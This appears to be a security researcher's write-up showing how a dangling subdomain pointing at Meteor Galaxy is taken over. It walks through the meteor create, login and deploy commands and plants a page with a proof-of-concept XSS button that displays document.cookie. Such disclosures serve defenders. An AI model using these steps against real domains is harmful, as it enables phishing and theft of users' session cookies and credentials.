While scanning my automation system found subdomain whose cname record pointed to eu-west-1.galaxy-ingress.meteor.com with a 404 response code.

404 Not Found: No applications registered for host '***.*****.***'.

meteor response

It’s looks like subdomain takeover is possible here :)

www.meteor.com says that

Meteor is an open source platform for seamlessly building and deploying Web, Mobile, and Desktop applications in Javascript.

After registering an account is necessary to add payment method under settings → billing, because custom subdomain can be used only with non free application instances.

meteor biling

Most simple way to deploy your application to meteor cloud is to use meteor cli tool https://docs.meteor.com/install.html

After installing, we can create new meteor application, I advise to use minimal template, because only minimal template doesn’t have mongodb dependency:

rival@meteor-takeover % meteor create --minimal .
Created a new Meteor app in current directory.

To run your new app:                          
If you are new to Meteor, try some of the learning resources here:
When you’re ready to deploy and host your new Meteor application, check out Cloud:
To start with a different app template, try one of the following:

Meteor will create all the necessary files for us.

The files located in the client directory are setting up your client side (web), you can see for example client/main.html where we can change html to something more appropriate, like this with xss payload:

  <title>Rivalsec meteor takeover</title>
  <h1>Rivalsec meteor takeover </h1>
    if the subdomain takeover is successful, a wide variety of attacks are possible (serving malicious content, phishing, stealing user session cookies, credentials, etc.).
  <button onclick="alert(document.cookie);">Click me for XSS</button>

meteor biling

Now we can login and deploy our app:

DEPLOY_HOSTNAME must be same as subdomains cname

rival@meteor-takeover % meteor login                                                                                            
Username: rivalsec
Logged in as rivalsec. Thanks for being a Meteor developer!

rival@meteor-takeover % DEPLOY_HOSTNAME=eu-west-1.galaxy.meteor.com meteor deploy ***.*****.***
Talking to Galaxy servers at https://eu-west-1.galaxy.meteor.com
Preparing to build your app...                
Browserslist: caniuse-lite is outdated. Please run:
  npx browserslist@latest --update-db
  Why you should do it regularly: https://github.com/browserslist/browserslist#browsers-data-updating
Preparing to upload your app...               
Uploaded app bundle for new app at ***.*****.***.
Galaxy is building the app into a native image.
Waiting for deployment updates from Galaxy... 
Building app image...                         
Deploying app...                              
You have successfully deployed the first version of your app.
For details, visit https://eu-west-1.galaxy.meteor.com/app/***.*****.***

Meteor will deploy application and receive new https certificate for our subdomain.

meteor biling